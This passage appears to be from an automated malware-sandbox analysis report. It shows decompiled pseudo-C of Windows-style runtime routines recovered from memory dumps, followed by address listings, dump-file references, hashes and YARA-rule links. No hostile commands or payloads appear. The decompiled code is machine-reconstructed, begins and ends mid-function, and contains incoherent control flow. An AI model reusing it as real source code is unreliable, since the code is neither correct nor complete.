						} else {
							_t151 = E009358C4(_a12, _t171, 1);
						}
						_t208 = _t151;
					}
					_t154 = E009358F7(0x80000000, _t208,  *((intOrPtr*)(_a4 + 8)), _v284,  &_v293, 1);
					if(_t154 == 0) {
						if(_v293 == _t154) {
							goto L27;
						}
						goto L55;
					} else {
						goto L31;
					}
				}
				if((_t171 & 0x80000000) == 0) {
					_t159 = (_t171 << 0x00000020 | _a12) >> 0x4 & 0x000000ff;
				} else {
					_t159 = E009358C4(_a12, _t171, 2);
				}
				_t208 = _t159;
				_t162 = E009358F7(0x80000000, _t208,  *((intOrPtr*)(_a4 + 4)), _v288,  &_v293, 0);
				if(_t162 == 0) {
					if(_v293 == _t162) {
						goto L27;
					}
					goto L28;
				} else {
					if(_v293 != 0) {
						goto L28;
					}
					goto L8;
				}
			}









































                                                0x009357c3
                                                0x009357c3
                                                0x009357ce
                                                0x009357d5
                                                0x009357d9
                                                0x009357db
                                                0x009357e5
                                                0x0095ff2c
                                                0x009358b0
                                                0x009358bc
                                                0x009358bc
                                                0x009357eb
                                                0x009357fa
                                                0x00935809
                                                0x00935816
                                                0x009358af
                                                0x009358af
                                                0x00000000
                                                0x009358af
                                                0x00935820
                                                0x00935826
                                                0x00938c18
                                                0x00938c22
                                                0x00000000
                                                0x00000000
                                                0x00938c28
                                                0x00938c2e
                                                0x00939066
                                                0x0093906f
                                                0x00939073
                                                0x00938c3d
                                                0x00938c3f
                                                0x00938c49
                                                0x00938c49
                                                0x00938c4e
                                                0x00938c51
                                                0x0094848f
                                                0x009390ab
                                                0x009390ab
                                                0x00000000
                                                0x009390ab
                                                0x00938c57
                                                0x00938c58
                                                0x0095ff58
                                                0x009358ae
                                                0x009358ae
                                                0x00000000
                                                0x009358ae
                                                0x00938c64
                                                0x0095ff36
                                                0x0095ff36
                                                0x00938c64
                                                0x00938c51
                                                0x00939079
                                                0x0093907f
                                                0x00939098
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00939098
                                                0x0093582c
                                                0x0093582c
                                                0x00935831
                                                0x00935836
                                                0x0093583d
                                                0x009427f1
                                                0x009427f5
                                                0x00942823
                                                0x0094282a
                                                0x0093588e
                                                0x00935892
                                                0x0096002a
                                                0x00960045
                                                0x0096002c
                                                0x00960038
                                                0x00960038
                                                0x00960060
                                                0x009484ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009484c0
                                                0x00935898
                                                0x0093589c
                                                0x00960070
                                                0x00960072
                                                0x0096007a
                                                0x0096007a
                                                0x00960095
                                                0x009484c7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009484cd
                                                0x009358a2
                                                0x009358a6
                                                0x009600a5
                                                0x009600a7
                                                0x009600b2
                                                0x009600b2
                                                0x009600d1
                                                0x009484d4
                                                0x00000000
                                                0x00000000
                                                0x009484da
                                                0x009358ac
                                                0x00000000
                                                0x009358ac
                                                0x0095ff78
                                                0x0095ff7c
                                                0x0095ffcb
                                                0x0095ffd2
                                                0x00000000
                                                0x00000000
                                                0x0095ffd8
                                                0x0095ffdc
                                                0x00000000
                                                0x00000000
                                                0x0095ffe5
                                                0x0095ffed
                                                0x0095ffef
                                                0x0095fff7
                                                0x0095fff7
                                                0x0095fffc
                                                0x0095fffc
                                                0x00960018
                                                0x009484ad
                                                0x00000000
                                                0x009484b3
                                                0x00000000
                                                0x009484b3
                                                0x009484ad
                                                0x0095ff81
                                                0x0095ff89
                                                0x0095ff8b
                                                0x0095ff93
                                                0x0095ff93
                                                0x0095ff98
                                                0x0095ff98
                                                0x0095ffb4
                                                0x0095ffbb
                                                0x00000000
                                                0x0095ffbd
                                                0x0095ffc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095ffc9
                                                0x0095ffbb
                                                0x009427fa
                                                0x00943616
                                                0x0095ff6e
                                                0x0094361c
                                                0x00943622
                                                0x00943622
                                                0x00943627
                                                0x00943627
                                                0x00942816
                                                0x0094281d
                                                0x00943634
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094281d
                                                0x0093584b
                                                0x0095ff4e
                                                0x00935851
                                                0x00935857
                                                0x00935857
                                                0x0093585c
                                                0x00935874
                                                0x0093587b
                                                0x009484a0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00935881
                                                0x00935888
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00935888

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 7b508c8b0aa69a6e03f886e684f73541fcba33b1de2654d72127083add5db433
                                                • Instruction ID: 999c3a9477daafe3e063b52d58560127076879bea71584a39b09b63bc4931c24
                                                • Opcode Fuzzy Hash: 7b508c8b0aa69a6e03f886e684f73541fcba33b1de2654d72127083add5db433
                                                • Instruction Fuzzy Hash: DEA1F271A142097AEF28DF60CC51BFE77A9AF49310F0504A9FD46DA1D1CA788D94DF21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00910F3F, Relevance: 1.5, Strings: 1, Instructions: 256COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00910F3F(unsigned int _a4, unsigned int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed char _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _t59;
				unsigned int _t60;
				intOrPtr _t69;
				signed int _t75;
				signed char _t87;
				unsigned int _t88;
				intOrPtr* _t89;
				signed int _t91;
				signed int _t92;
				void* _t99;
				signed int _t100;
				signed int _t106;
				void* _t108;
				signed int _t109;
				unsigned int _t111;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t119;
				intOrPtr _t122;
				signed int _t126;
				signed int _t127;
				signed int _t133;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t146;

				_t89 = _a4;
				_t59 =  *_t89;
				asm("sbb esi, esi");
				_t127 = _t126 & _a12;
				_v20 = _t59;
				_t60 = _t59 - 1;
				_v24 = _t127;
				_v28 =  *((intOrPtr*)(_t89 + 4));
				if(_a8 == 0) {
					return _t127 & 0xfffffff8;
				}
				while(1) {
					_t91 = 0 + _t127;
					_t111 = _t60;
					_t122 = _v28 - (0 << 2);
					_v12 = _t122;
					if(_t111 - _t91 + 1 < _a8) {
						goto L16;
					}
					_t87 = _t111 - _a8 + 1;
					_v8 = _t122 + (_t87 >> 5) * 4;
					_t75 = _t122 + (_t91 >> 5) * 4;
					_v16 = _t87;
					_t133 = (1 << (_t91 & 0x0000001f)) - 0x00000001 |  *_t75;
					if(_a8 > 0x3f) {
						_t91 = _v8;
						_a4 = _t91;
						__eflags = _t87 & 0x0000001f;
						if((_t87 & 0x0000001f) != 0) {
							_t91 = _t91 + 4;
							__eflags = _t91;
							_a4 = _t91;
						}
						__eflags = _t133;
						if(_t133 == 0) {
							L29:
							_t91 = (_t75 - _t122 >> 2 << 5) - _t133;
							__eflags = _t91 - _t87;
							if(_t91 > _t87) {
								goto L16;
							}
							_t111 = _a8 - _t133;
							_t136 = _t75 + (_t111 >> 5) * 4;
							while(1) {
								_t75 = _t75 + 4;
								__eflags = _t75 - _t136;
								if(_t75 == _t136) {
									break;
								}
								__eflags =  *_t75;
								if( *_t75 != 0) {
									goto L22;
								}
							}
							_t111 = _t111 & 0x0000001f;
							__eflags = _t111;
							if(__eflags == 0) {
								L9:
								if(_t91 == 0xffffffff) {
									L38:
									_t127 = 0;
									__eflags = _v24;
									if(_v24 == 0) {
										goto L10;
									}
									_t69 = _a12 + _a8;
									__eflags = _t69 - _v20;
									if(_t69 > _v20) {
										_t69 = _v20;
									}
									_t60 = _t69 - 1;
									_v24 = _t127;
									continue;
								}
								L10:
								return _t92;
							}
							asm("bsf esi, [eax]");
							if(__eflags == 0) {
								_t136 = 0x20;
							}
							__eflags = _t136 - _t111;
							if(_t136 >= _t111) {
								goto L9;
							} else {
								goto L22;
							}
						} else {
							_t75 = _t75 + 4;
							__eflags =  *_t75;
							if(__eflags != 0) {
								while(1) {
									L22:
									__eflags = _t75 - _a4;
									if(_t75 > _a4) {
										goto L16;
									}
									_t75 = _t75 + 4;
									__eflags =  *_t75;
									if(__eflags != 0) {
										continue;
									}
									asm("bsr edx, [eax-0x4]");
									L25:
									if(__eflags != 0) {
										_t99 = 0x1f;
										_t100 = _t99 - _t111;
										__eflags = _t100;
									} else {
										_t100 = 0x20;
									}
									_t133 = _t100;
									goto L29;
								}
								goto L16;
							}
							asm("bsr edx, esi");
							goto L25;
						}
					}
					if(_a8 >= 0x20) {
						while(1) {
							_t91 = 0x80000000;
							while(1) {
								L45:
								__eflags = _t91 & _t133;
								if(__eflags == 0) {
									break;
								}
								_t75 = _t75 + 4;
								__eflags = _t75 - _v8;
								if(_t75 > _v8) {
									goto L16;
								}
								_t133 =  *_t75;
							}
							asm("bsr ecx, esi");
							if(__eflags != 0) {
								_t137 = 0x1f;
								_t138 = _t137 - _t91;
								__eflags = _t138;
							} else {
								_t138 = 0x20;
							}
							_t91 = ((_t75 - _t122 >> 2) + 1 << 5) - _t138;
							__eflags = _t91 - _t87;
							if(_t91 > _t87) {
								goto L16;
							} else {
								_t114 = _a8 - _t138;
								__eflags = _t114;
								if(_t114 == 0) {
									goto L9;
								}
								_t75 = _t75 + 4;
								_t133 =  *_t75;
								__eflags = _t114 - 0x20;
								if(__eflags < 0) {
									L55:
									asm("bsf ebx, esi");
									if(__eflags == 0) {
										_t87 = 0x20;
									}
									__eflags = _t87 - _t114;
									if(_t87 >= _t114) {
										goto L9;
									} else {
										_t87 = _v16;
										do {
											_t91 = 0x80000000;
											goto L45;
										} while (_t133 != 0);
										_t114 = _t114 - 0x20;
										__eflags = _t114;
										if(_t114 == 0) {
											goto L9;
										}
										_t75 = _t75 + 4;
										__eflags = _t75;
										_t133 =  *_t75;
										goto L55;
									}
								}
								__eflags = _t133;
							}
						}
					}
					if(_a8 > 1) {
						_t91 = 0;
						_t115 = _t111 >> 5;
						__eflags = _t115;
						_t116 = _t122 + _t115 * 4;
						_v32 = _t116;
						while(1) {
							__eflags = _t133 - 0xffffffff;
							if(__eflags != 0) {
								goto L64;
							}
							while(1) {
								L61:
								_t75 = _t75 + 4;
								__eflags = _t75 - _v8;
								if(_t75 > _v8) {
									goto L16;
								}
								_t133 =  *_t75;
								__eflags = _t133 - 0xffffffff;
								if(_t133 == 0xffffffff) {
									continue;
								}
								_t91 = 0;
								__eflags = 0;
								goto L64;
							}
							goto L16;
							L64:
							asm("bsf edx, esi");
							if(__eflags == 0) {
								_t116 = 0x20;
							}
							_t88 = _a8;
							__eflags = _t116 + _t91 - _t88;
							if(_t116 + _t91 >= _t88) {
								_t106 =  ~_t91;
								goto L71;
							} else {
								_t119 =  !_t133;
								_a4 = _t88;
								while(1) {
									_t91 = _a4 >> 1;
									_t116 = _t119 & _t119 >> _t91;
									__eflags = _t116;
									if(_t116 == 0) {
										break;
									}
									_a4 = _a4 - _t91;
									__eflags = _a4 - 1;
									if(_a4 > 1) {
										continue;
									}
									_t122 = _v12;
									asm("bsf ecx, edx");
									L71:
									_t91 = _t106 + (_t75 - _t122 >> 2 << 5);
									__eflags = _t91 - _v16;
									L8:
									if(_t146 > 0) {
										goto L16;
									}
									goto L9;
								}
								__eflags = _t75 - _v32;
								if(__eflags == 0) {
									goto L16;
								}
								asm("bsr edx, esi");
								if(__eflags != 0) {
									_t108 = 0x1f;
									_t91 = _t108 - _t116;
									__eflags = _t91;
								} else {
									_t91 = 0x20;
								}
								_t122 = _v12;
								_t75 = _t75 + 4;
								_t133 =  *_t75;
								__eflags = _t133 - 0xffffffff;
								if(__eflags != 0) {
									goto L64;
								}
								goto L61;
							}
						}
					}
					_t91 = 1;
					if(_t133 == 0xffffffff) {
						while(1) {
							_t75 = _t75 + 4;
							__eflags = _t75 - _v8;
							if(_t75 > _v8) {
								goto L16;
							}
							_t91 =  *_t75;
							__eflags = _t91 - 0xffffffff;
							if(_t91 != 0xffffffff) {
								goto L7;
							}
						}
						goto L16;
					}
					L7:
					_t109 =  !_t91;
					asm("bsf ecx, ecx");
					_a4 = _t109;
					_t91 = (_t75 - _t122 >> 2 << 5) + _t109;
					_t146 = _t91 - _t87;
					goto L8;
					L16:
					_t92 = _t91 | 0xffffffff;
					goto L38;
				}
			}





































                                                0x00910f47
                                                0x00910f4a
                                                0x00910f53
                                                0x00910f55
                                                0x00910f58
                                                0x00910f5b
                                                0x00910f60
                                                0x00910f63
                                                0x00910f66
                                                0x00000000
                                                0x0095b6ea
                                                0x00910f6e
                                                0x00910f73
                                                0x00910f76
                                                0x00910f7d
                                                0x00910f84
                                                0x00910f8a
                                                0x00000000
                                                0x00000000
                                                0x00910f97
                                                0x00910fa0
                                                0x00910fae
                                                0x00910fb1
                                                0x00910fb5
                                                0x00910fbb
                                                0x0095b6f9
                                                0x0095b6fc
                                                0x0095b6ff
                                                0x0095b702
                                                0x0095b704
                                                0x0095b704
                                                0x0095b707
                                                0x0095b707
                                                0x0095b70a
                                                0x0095b70c
                                                0x0095b73a
                                                0x0095b744
                                                0x0095b746
                                                0x0095b748
                                                0x00000000
                                                0x00000000
                                                0x0095b74d
                                                0x0095b754
                                                0x0095b75e
                                                0x0095b75e
                                                0x0095b761
                                                0x0095b763
                                                0x00000000
                                                0x00000000
                                                0x0095b759
                                                0x0095b75c
                                                0x00000000
                                                0x00000000
                                                0x0095b75c
                                                0x0095b765
                                                0x0095b765
                                                0x0095b768
                                                0x00910ffc
                                                0x00910fff
                                                0x0095b780
                                                0x0095b780
                                                0x0095b782
                                                0x0095b785
                                                0x00000000
                                                0x00000000
                                                0x0095b791
                                                0x0095b793
                                                0x0095b796
                                                0x0095b798
                                                0x0095b798
                                                0x0095b79b
                                                0x0095b79c
                                                0x00000000
                                                0x0095b79c
                                                0x00911005
                                                0x00000000
                                                0x00911008
                                                0x0095b76e
                                                0x0095b771
                                                0x0095b775
                                                0x0095b775
                                                0x0095b776
                                                0x0095b778
                                                0x00000000
                                                0x0095b77e
                                                0x00000000
                                                0x0095b77e
                                                0x0095b70e
                                                0x0095b70e
                                                0x0095b711
                                                0x0095b714
                                                0x0095b71b
                                                0x0095b71b
                                                0x0095b71b
                                                0x0095b71e
                                                0x00000000
                                                0x00000000
                                                0x0095b720
                                                0x0095b723
                                                0x0095b726
                                                0x00000000
                                                0x00000000
                                                0x0095b728
                                                0x0095b72c
                                                0x0095b72c
                                                0x0095b735
                                                0x0095b736
                                                0x0095b736
                                                0x0095b72e
                                                0x0095b730
                                                0x0095b730
                                                0x0095b738
                                                0x00000000
                                                0x0095b738
                                                0x00000000
                                                0x0095b71b
                                                0x0095b716
                                                0x00000000
                                                0x0095b716
                                                0x0095b70c
                                                0x00910fc5
                                                0x0095b7a4
                                                0x0095b7a4
                                                0x0095b7b9
                                                0x0095b7b9
                                                0x0095b7b9
                                                0x0095b7bb
                                                0x00000000
                                                0x00000000
                                                0x0095b7ab
                                                0x0095b7ae
                                                0x0095b7b1
                                                0x00000000
                                                0x00000000
                                                0x0095b7b7
                                                0x0095b7b7
                                                0x0095b7bd
                                                0x0095b7c0
                                                0x0095b7c9
                                                0x0095b7ca
                                                0x0095b7ca
                                                0x0095b7c2
                                                0x0095b7c4
                                                0x0095b7c4
                                                0x0095b7d7
                                                0x0095b7d9
                                                0x0095b7db
                                                0x00000000
                                                0x0095b7e1
                                                0x0095b7e4
                                                0x0095b7e4
                                                0x0095b7e6
                                                0x00000000
                                                0x00000000
                                                0x0095b7ec
                                                0x0095b7ef
                                                0x0095b7f1
                                                0x0095b7f4
                                                0x0095b808
                                                0x0095b808
                                                0x0095b80b
                                                0x0095b80f
                                                0x0095b80f
                                                0x0095b810
                                                0x0095b812
                                                0x00000000
                                                0x0095b818
                                                0x0095b818
                                                0x0095b7a4
                                                0x0095b7a4
                                                0x00000000
                                                0x0095b7a9
                                                0x0095b7fa
                                                0x0095b7fa
                                                0x0095b7fd
                                                0x00000000
                                                0x00000000
                                                0x0095b803
                                                0x0095b803
                                                0x0095b806
                                                0x00000000
                                                0x0095b806
                                                0x0095b812
                                                0x0095b7f6
                                                0x0095b7f6
                                                0x0095b7db
                                                0x0095b7a4
                                                0x00910fcf
                                                0x0095b81d
                                                0x0095b81f
                                                0x0095b81f
                                                0x0095b822
                                                0x0095b825
                                                0x0095b828
                                                0x0095b828
                                                0x0095b82b
                                                0x00000000
                                                0x00000000
                                                0x0095b82d
                                                0x0095b82d
                                                0x0095b82d
                                                0x0095b830
                                                0x0095b833
                                                0x00000000
                                                0x00000000
                                                0x0095b839
                                                0x0095b83b
                                                0x0095b83e
                                                0x00000000
                                                0x00000000
                                                0x0095b840
                                                0x0095b840
                                                0x00000000
                                                0x0095b840
                                                0x00000000
                                                0x0095b842
                                                0x0095b842
                                                0x0095b845
                                                0x0095b849
                                                0x0095b849
                                                0x0095b84a
                                                0x0095b84f
                                                0x0095b851
                                                0x0095b8ad
                                                0x00000000
                                                0x0095b853
                                                0x0095b855
                                                0x0095b857
                                                0x0095b85a
                                                0x0095b85d
                                                0x0095b863
                                                0x0095b863
                                                0x0095b865
                                                0x00000000
                                                0x00000000
                                                0x0095b867
                                                0x0095b86a
                                                0x0095b86e
                                                0x00000000
                                                0x00000000
                                                0x0095b870
                                                0x0095b873
                                                0x0095b876
                                                0x0095b87e
                                                0x0095b880
                                                0x00910ff6
                                                0x00910ff6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00910ff6
                                                0x0095b888
                                                0x0095b88b
                                                0x00000000
                                                0x00000000
                                                0x0095b891
                                                0x0095b894
                                                0x0095b89d
                                                0x0095b89e
                                                0x0095b89e
                                                0x0095b896
                                                0x0095b898
                                                0x0095b898
                                                0x0095b8a0
                                                0x0095b8a3
                                                0x0095b8a6
                                                0x0095b828
                                                0x0095b82b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b82b
                                                0x0095b851
                                                0x0095b828
                                                0x00910fd5
                                                0x00910fda
                                                0x0093fdf8
                                                0x0093fdf8
                                                0x0093fdfb
                                                0x0093fdfe
                                                0x00000000
                                                0x00000000
                                                0x0093fe04
                                                0x0093fe06
                                                0x0093fe09
                                                0x00000000
                                                0x00000000
                                                0x0093fe0f
                                                0x00000000
                                                0x0093fdf8
                                                0x00910fe0
                                                0x00910fe0
                                                0x00910fe2
                                                0x00910fef
                                                0x00910ff2
                                                0x00910ff4
                                                0x00000000
                                                0x0095b6f1
                                                0x0095b6f1
                                                0x00000000
                                                0x0095b6f1

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                • Instruction ID: 19e88fc9db39736433f8d5d1ecd5b5d98429224bcbc9b16a25a5c511b4c0b06b
                                                • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                                • Instruction Fuzzy Hash: 6781FC33E011199BDF28CE5AC8956BD7765EF88322F258229DD16AB7C4D730AD85CBC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009ACBA4, Relevance: .5, Instructions: 529COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E009ACBA4(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t292;
				signed char _t296;
				signed char _t306;
				signed char _t308;
				signed int _t319;
				signed int _t329;
				signed short _t332;
				signed int _t334;
				intOrPtr _t339;
				signed char _t340;
				signed int _t342;
				signed int _t358;
				signed int _t361;
				signed int _t372;
				signed int _t375;
				signed int _t377;
				short _t379;
				signed int _t386;
				signed int _t387;
				signed int _t393;
				signed short _t396;
				signed int _t406;
				signed int _t416;
				signed int _t417;
				signed int _t419;
				intOrPtr _t426;
				signed short _t427;
				signed short _t429;
				void* _t430;
				short _t431;
				short _t432;
				signed int _t437;
				void* _t438;
				short _t441;
				signed char _t443;
				signed int _t445;
				signed short _t448;
				signed int _t451;
				short _t452;
				signed short* _t463;
				unsigned int _t464;
				signed int _t472;
				signed short* _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				void* _t479;
				signed int _t480;

				_t414 = __ebx;
				_push(0x268);
				_push(0x8fd4f8);
				E008FE1E0(__ebx, __edi, __esi);
				_t455 = 0;
				 *(_t479 - 0x40) = 0;
				 *(_t479 - 0x48) = 0;
				 *(_t479 - 0x58) = 0;
				 *(_t479 - 0x60) = 0;
				 *(_t479 - 0x54) = 0;
				 *( *((intOrPtr*)(_t479 + 0x28)) + 0x40) = 0;
				if( *(_t479 + 0x20) <= 0x80) {
					__eflags =  *( *((intOrPtr*)(_t479 + 8)) + 0xc8) >> 0x00000002 & 0x00000001;
					if(__eflags != 0) {
						_push(0x374);
						_t406 = E009ACAB3(__ebx, 0, __esi, __eflags);
						__eflags = _t406;
						if(_t406 != 0) {
							 *((intOrPtr*)(_t479 - 4)) = 0;
							E0094B6E0(0x310);
							 *(_t479 - 0x18) = _t480;
							 *(_t479 - 0x48) = _t480;
							 *((intOrPtr*)(_t479 - 4)) = 0xfffffffe;
							E009ACB0E(0, __eflags, _t479 - 0x48, _t479 - 0x58);
						}
					}
					 *(_t479 - 0x38) = _t455;
					_t463 =  *((intOrPtr*)(_t479 + 8)) + 0x68;
					 *(_t479 - 0x68) = _t463;
					while(1) {
						_t292 =  *((intOrPtr*)(_t479 + 0xc));
						 *(_t479 - 0x64) = _t455;
						 *(_t479 - 0x30) = _t455;
						_t416 = 0x50;
						 *(_t479 - 0x20) = _t416;
						 *(_t479 - 0x24) = _t416;
						 *((char*)(_t479 - 0x2b)) = 0;
						 *((char*)(_t479 - 0x2a)) = 0;
						 *((char*)(_t479 - 0x29)) = 0;
						 *(_t479 - 0x34) = _t455;
						 *(_t479 - 0x3c) = _t455;
						 *(_t479 - 0x44) = _t455;
						 *(_t479 - 0x50) = _t455;
						 *(_t479 - 0x4c) = _t455;
						_t417 =  *(_t292 + 8);
						_t451 =  *(_t292 + 0xc);
						__eflags = _t463[2];
						if(_t463[2] == 0) {
							goto L86;
						}
						_t414 = _t463[2];
						__eflags =  *((intOrPtr*)(_t292 + 4)) - _t414;
						if( *((intOrPtr*)(_t292 + 4)) <= _t414) {
							L10:
							_t296 =  *_t463 >> 6;
							__eflags = _t296 & 0x00000001;
							if((_t296 & 0x00000001) == 0) {
								L12:
								_t414 =  *(_t463 - 4) & _t451;
								__eflags =  *(_t463 - 8) & _t417 |  *(_t463 - 4) & _t451;
								if(( *(_t463 - 8) & _t417 |  *(_t463 - 4) & _t451) == 0) {
									goto L86;
								}
								_t414 =  *(_t463 - 0x10);
								_t419 =  *(_t463 - 0xc) & _t451;
								__eflags = (_t414 & _t417) - _t414;
								if((_t414 & _t417) != _t414) {
									goto L86;
								}
								__eflags = _t419 -  *(_t463 - 0xc);
								if(_t419 !=  *(_t463 - 0xc)) {
									goto L86;
								}
								L15:
								 *(_t479 - 0x6c) =  *(_t479 - 0x38) << 2;
								_t421 = 1;
								asm("lock xadd [eax], ecx");
								__eflags =  *(_t479 + 0x1c);
								if( *(_t479 + 0x1c) != 0) {
									 *(_t479 - 0x20) = 0x68;
								}
								__eflags =  *_t463 & 0x00000001;
								if(( *_t463 & 0x00000001) != 0) {
									_push(_t479 - 0x5c);
									_push(1);
									_t414 = 0x20008;
									_push(0x20008);
									_t396 = E008EFC00(0xfffffffe);
									 *(_t479 - 0x28) = _t396;
									__eflags = _t396 - 0xc000007c;
									if(_t396 == 0xc000007c) {
										_push(_t479 - 0x5c);
										_push(0x20008);
										 *(_t479 - 0x28) = E008F10D0(0xffffffff);
									}
									__eflags =  *(_t479 - 0x28);
									if( *(_t479 - 0x28) >= 0) {
										 *(_t479 - 0x28) = E008EFBB8( *((intOrPtr*)(_t479 - 0x5c)), 1, _t479 - 0x278, 0x80, _t479 - 0x3c);
										E008EF9F0( *((intOrPtr*)(_t479 - 0x5c)));
										 *(_t479 - 0x3c) =  *(_t479 - 0x3c) - 8;
										_t455 =  *(_t479 - 0x3c) + 0x0000000f & 0x0000fff8;
										 *(_t479 - 0x34) = _t455;
										__eflags =  *(_t479 - 0x28);
										if( *(_t479 - 0x28) >= 0) {
											 *((char*)(_t479 - 0x2a)) = 1;
											_t70 = _t479 - 0x20;
											 *_t70 =  *(_t479 - 0x20) + (_t455 & 0x0000ffff);
											__eflags =  *_t70;
										}
									}
								}
								_t464 =  *_t463;
								_t306 = _t464 >> 2;
								__eflags = _t306 & 0x00000001;
								if((_t306 & 0x00000001) != 0) {
									__eflags =  *(_t479 - 0x48);
									if( *(_t479 - 0x48) != 0) {
										 *((char*)(_t479 - 0x29)) = 1;
										_t77 = _t479 - 0x20;
										 *_t77 =  *(_t479 - 0x20) + ( *(_t479 - 0x58) & 0x0000ffff);
										__eflags =  *_t77;
									}
								}
								_t308 = _t464 >> 1;
								__eflags = _t308 & 0x00000001;
								if((_t308 & 0x00000001) != 0) {
									 *((char*)(_t479 - 0x2b)) = 1;
									_t82 = _t479 - 0x20;
									 *_t82 =  *(_t479 - 0x20) + 0x10;
									__eflags =  *_t82;
								}
								_t463 = ( *( *((intOrPtr*)(_t479 + 0x28)) + 0x40) << 4) +  *((intOrPtr*)(_t479 + 0x28));
								 *(_t479 - 0x28) =  *(_t479 - 0x28) & 0x00000000;
								__eflags =  *(_t479 + 0x20);
								if( *(_t479 + 0x20) <= 0) {
									L43:
									__eflags =  *(_t479 - 0x50);
									if( *(_t479 - 0x50) != 0) {
										_t111 = _t479 - 0x20;
										 *_t111 =  *(_t479 - 0x20) + (( *(_t479 - 0x44) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
										__eflags =  *_t111;
									}
									__eflags =  *(_t479 - 0x40);
									if( *(_t479 - 0x40) != 0) {
										L92:
										asm("lock xadd [eax], ecx");
										L93:
										goto L94;
									} else {
										_t463[6] =  *(_t479 - 0x20);
										_t455 =  *( *(_t479 - 0x6c) + 0x9d77e8);
										 *(_t479 - 0x28) = _t455;
										__eflags = _t455;
										if(_t455 == 0) {
											L91:
											 *(_t479 - 0x40) = 6;
											goto L92;
										}
										__eflags = _t455 - 0x9d77e8;
										if(_t455 == 0x9d77e8) {
											goto L91;
										}
										_t421 = _t479 - 0x78;
										_t414 = E009AC696( *(_t479 - 0x20), _t455,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t479 - 0x78, _t479 - 0x64);
										__eflags = _t414;
										if(_t414 == 0) {
											_t319 =  *(_t479 - 0x20) + 0x00000007 & 0xfffffff8;
											__eflags = _t319 - 0xffff;
											if(_t319 <= 0xffff) {
												_t421 =  *((intOrPtr*)(_t455 + 0x80)) - 0x48;
												__eflags =  *((intOrPtr*)(_t455 + 0x80)) - 0x48 - _t319;
												asm("sbb eax, eax");
												 *(_t479 - 0x40) = (_t319 & 0x000000e2) + 8;
											} else {
												 *(_t479 - 0x40) = 0x216;
											}
											goto L92;
										}
										 *_t463 = _t455;
										_t463[2] = _t414;
										_t463[4] =  *(_t479 - 0x64);
										 *( *((intOrPtr*)(_t479 + 0x28)) + 0x40) =  *( *((intOrPtr*)(_t479 + 0x28)) + 0x40) + 1;
										 *_t414 =  *(_t479 - 0x20);
										 *((short*)(_t414 + 2)) = 0xc012;
										 *(_t414 + 4) =  *((intOrPtr*)(_t479 + 0x14));
										 *((short*)(_t414 + 6)) =  *((intOrPtr*)(_t479 + 0x10));
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t140 = _t414 + 0x40; // 0x40
										_t455 = _t140;
										__eflags =  *(_t479 + 0x18);
										if( *(_t479 + 0x18) == 0) {
											__eflags =  *[fs:0x18] + 0xf50;
										}
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__eflags =  *(_t479 + 0x1c);
										if( *(_t479 + 0x1c) != 0) {
											_t142 = _t414 + 0x50; // 0x50
											_t387 = _t142;
											_t438 = 0x18;
											 *_t387 = _t438;
